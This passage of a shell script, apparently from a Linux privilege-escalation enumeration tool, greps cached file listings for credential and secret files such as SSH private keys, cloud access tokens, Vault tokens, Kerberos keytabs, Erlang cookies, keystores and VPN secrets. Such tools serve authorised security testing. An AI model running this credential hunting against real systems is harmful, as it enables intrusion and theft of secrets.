"^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) - PSTORAGE_HOSTAPD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) - PSTORAGE_RACOON=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70) - PSTORAGE_VNC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) - PSTORAGE_LDAP=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "ldap$" | sort | uniq | head -n 70) - PSTORAGE_OPENVPN=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70) - PSTORAGE_SSH=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70) - PSTORAGE_CERTSB4=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) - PSTORAGE_CERTSBIN=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) - PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) - PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/private|^/tmp" | grep -E "agent.*$" | sort | uniq | head -n 70) - PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/usr|^$GREPHOMESEARCH" | grep -E "ssh.*config$" | sort | uniq | head -n 70) - PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70) - PSTORAGE_KERBEROS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$|secrets\.ldb$|\.secrets\.mkey$|sssd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_KIBANA=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) - PSTORAGE_KNOCKD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) - PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "logstash$" | sort | uniq | head -n 70) - PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) - PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) - PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.vault-token$" | sort | uniq | head -n 70) - PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "couchdb$" | sort | uniq | head -n 70) - PSTORAGE_REDIS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "redis\.conf$" | sort | uniq | head -n 70) - PSTORAGE_MOSQUITTO=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) - PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "neo4j$" | sort | uniq | head -n 70) - PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) - PSTORAGE_ERLANG=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) - PSTORAGE_GMV_AUTH=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) - PSTORAGE_IPSEC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) - PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.irssi$" | sort | uniq | head -n 70) - PSTORAGE_KEYRING=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) - PSTORAGE_FILEZILLA=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70) - PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) - PSTORAGE_SPLUNK=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "passwd$" | sort | uniq | head -n 70) - PSTORAGE_GITLAB=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E 